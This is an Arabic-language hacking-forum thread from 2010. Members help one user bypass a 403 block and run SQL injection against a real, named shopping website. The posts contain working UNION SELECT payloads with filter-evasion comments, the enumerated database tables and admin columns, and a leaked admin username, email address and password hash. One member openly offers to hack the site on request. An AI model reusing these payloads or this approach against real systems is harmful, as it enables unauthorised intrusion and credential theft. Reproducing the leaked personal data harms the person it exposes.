:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)

- - help plz forbiden 403 (http://www.vbspiders.com/vb/t33923.html)

biloo

08-04-2010 01:51 PM

help plz forbiden 403

http://www.site.com/main/shopping.php?id=-155 /**/UNION/**/ SELECT 1,group_concat(table_name,0x3a,column_name,0x3a, table_schema),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+information_sche ma.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

مششكلة مع الفوربدن ارجو مساعدة بلييز:cry[1]:

dragon47

08-04-2010 01:55 PM

اخي ممكن رابط الموقع الاصلي وانا رح اخترقه لك

biloo

08-04-2010 02:51 PM

http://www.armorysquareofsyracuse.co...ng.php?id=-155 /**/UNION/**/ SELECT 1,group_concat(table_name,0x3a,column_name,0x3a, table_schema),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+information_sche ma.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

dragon47 تفضل الموقع الاصلي

ad me plz : biloo911@hotmail.com

Q2-FOX2R

08-05-2010 08:38 PM

اممم
أعتقد الموقع أصلا ما عليه ثغرة حقن

لو دخلت هون http://www.site.com/main/shopping.php?id=155
رح يديك محتى الضفحة الي هو No input file specified.

و لو ضفت علامة '
رح يديك نفس الشئ

الشبح المرح

08-05-2010 10:00 PM

يايونس الموقع هو ذا http://www.armorysquareofsyracuse.co...ing.php?id=155

دقيقة اكمل الحقنة و ارجع

الشبح المرح

08-05-2010 10:05 PM

اخوي على ما اضن ان information_schema لاتعمل

لاني جربت ابحث عن اي جدول و لا يوجد

و الله اعلم

Q2-FOX2R

08-06-2010 02:48 PM

هآ اممم طلعت انا البليد فيكم هههه
طيب
خود حبيبي

authentication:user_pass:armorysquare
hc_admin:Passwrd:armorysquare

armorysquare هدا هي القاعدة
authentication جدول عليه كلمة باص
hc_admin و دة ثاني على نفس القاعدة يحمل كلمة باص

و هده هي كل عواميد الجودل بتاع الأدمن بعبارة أخرى دهhc_admin

PkID
FirstName
LastName
Email
Passwrd
IsActive
LoginCnt
LastLogin
SuperAdmin
ShowInstructions
PCKey

و في الأخير هدي هي الحقنة الأخيرة لأستخرآج الباسوورد و اليوزر و كمان الاميل هههه

تفضل
http://www.armorysquareofsyracuse.co...rom+hc_admin--

امممم
Robert:0536015e570c6bc145aa54a49f99f000:rob@lerent ech.com

الباسوورد مشفر
0536015e570c6bc145aa54a49f99f000

بعد كل ده
ما أبيك غير أنك تقيمني لو أفدتك
اخوك في الله يونس

biloo

08-06-2010 05:27 PM

با رك الله فيك يا اخ سنتواصل عبر الامايل ان شاء الله

biloo

08-06-2010 05:48 PM

ممكن كيف تخطيت الفوربيدن في

http://www.armorysquareofsyracuse.co...ng.php?id=-155 /**/UNION/**/ SELECT 1,group_concat(table_name,0x3a,column_name,0x3a, table_schema),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+information_sche ma.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

للحصول على

authentication:user_pass:armorysquare
hc_admin:Passwrd:armorysquare

وشكرا اخي

Q2-FOX2R

08-06-2010 06:47 PM

http://www.armorysquareofsyracuse.co...115,%2037%29--

شوف الحقنة دي تفهم بادن الله

الساعة الآن 08:36 AM

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0